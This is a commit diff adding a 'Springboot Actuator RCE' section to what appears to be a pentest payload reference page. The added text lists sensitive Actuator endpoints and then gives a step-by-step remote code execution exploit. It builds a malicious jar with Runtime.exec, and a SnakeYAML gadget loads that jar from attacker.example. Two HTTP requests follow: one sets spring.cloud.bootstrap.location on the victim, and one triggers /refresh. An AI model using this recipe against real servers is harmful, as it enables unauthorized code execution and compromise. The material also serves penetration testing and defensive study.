Add Springboot Actuator RCE
parent
ae3a4d4336
commit
1535077d9d
|
@ -4,16 +4,91 @@
|
||||||
|
|
||||||
Actuator endpoints let you monitor and interact with your application.
|
Actuator endpoints let you monitor and interact with your application.
|
||||||
Spring Boot includes a number of built-in endpoints and lets you add your own.
|
Spring Boot includes a number of built-in endpoints and lets you add your own.
|
||||||
For example, the health endpoint provides basic application health information.
|
For example, the `/health` endpoint provides basic application health information.
|
||||||
|
|
||||||
Some of them contains sensitive info such as :
|
Some of them contains sensitive info such as :
|
||||||
|
|
||||||
- `/trace` (by default the last 100 HTTP requests with headers)
|
- `/trace` - Displays trace information (by default the last 100 HTTP requests with headers).
|
||||||
- `/env` (the current environment properties)
|
- `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment).
|
||||||
- `/heapdump` (builds and returns a heap dump from the JVM used by our application).
|
- `/heapdump` - Builds and returns a heap dump from the JVM used by our application.
|
||||||
|
- `/dump` - Displays a dump of threads (including a stack trace).
|
||||||
|
- `/logfile` - Outputs the contents of the log file.
|
||||||
|
- `/mappings` - Shows all of the MVC controller mappings.
|
||||||
|
|
||||||
These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default.
|
These endpoints are enabled by default in Springboot 1.X.
|
||||||
|
Note: Sensitive endpoints will require a username/password when they are accessed over HTTP.
|
||||||
|
|
||||||
|
Since Springboot 2.X only `/health` and `/info` are enabled by default.
|
||||||
|
|
||||||
|
### Remote Code Execution via `/env`
|
||||||
|
|
||||||
|
Spring is able to load external configurations in the YAML format.
|
||||||
|
The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks.
|
||||||
|
In other words, an attacker can gain remote code execution by loading a malicious config file.
|
||||||
|
|
||||||
|
#### Steps
|
||||||
|
|
||||||
|
1. Generate a payload of SnakeYAML deserialization gadget.
|
||||||
|
|
||||||
|
- Build malicious jar
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/artsploit/yaml-payload.git
|
||||||
|
cd yaml-payload
|
||||||
|
# Edit the payload before executing the last commands (see below)
|
||||||
|
javac src/artsploit/AwesomeScriptEngineFactory.java
|
||||||
|
jar -cvf yaml-payload.jar -C src/ .
|
||||||
|
```
|
||||||
|
|
||||||
|
- Edit src/artsploit/AwesomeScriptEngineFactory.java
|
||||||
|
|
||||||
|
```java
|
||||||
|
public AwesomeScriptEngineFactory() {
|
||||||
|
try {
|
||||||
|
Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE
|
||||||
|
} catch (IOException e) {
|
||||||
|
e.printStackTrace();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
- Create a malicious yaml config (yaml-payload.yml)
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
!!javax.script.ScriptEngineManager [
|
||||||
|
!!java.net.URLClassLoader [[
|
||||||
|
!!java.net.URL ["http://attacker.example/yaml-payload.jar"]
|
||||||
|
]]
|
||||||
|
]
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
2. Host the malicious files on your server.
|
||||||
|
|
||||||
|
- yaml-payload.jar
|
||||||
|
- yaml-payload.yml
|
||||||
|
|
||||||
|
|
||||||
|
3. Change `spring.cloud.bootstrap.location` to your server.
|
||||||
|
|
||||||
|
```
|
||||||
|
POST /env HTTP/1.1
|
||||||
|
Host: victim.example:8090
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 59
|
||||||
|
|
||||||
|
spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml
|
||||||
|
```
|
||||||
|
|
||||||
|
4. Reload the configuration.
|
||||||
|
|
||||||
|
```
|
||||||
|
POST /refresh HTTP/1.1
|
||||||
|
Host: victim.example:8090
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 0
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
|
* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
|
||||||
|
* [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
|
||||||
|
|
Loading…
Reference in New Issue